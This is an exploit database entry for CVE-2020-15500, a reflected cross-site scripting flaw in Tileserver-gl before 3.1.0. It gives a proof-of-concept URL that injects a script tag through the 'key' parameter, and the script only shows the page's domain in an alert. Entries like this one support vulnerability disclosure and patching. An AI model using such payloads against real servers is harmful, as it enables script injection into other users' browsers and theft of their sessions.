id: 36111
date: 04/15/2021
title: Tileserver-gl 3.0.0 - (key) Reflected Cross-Site Scripting Vulnerability
author: Akash Chathoth
cves: CVE-2020-15500

# Exploit Title: Tileserver-gl 3.0.0 - 'key' Reflected Cross-Site Scripting (XSS)
# Exploit Author: Akash Chathoth
# Vendor Homepage: http://tileserver.org/
# Software Link: https://github.com/maptiler/tileserver-gl
# Version: versions <3.1.0
# Tested on: 2.6.0
# CVE: 2020-15500

Exploit : http://example.com/?key="><script>alert(document.domain)</script>

#  0day.today [2023-03-22]  #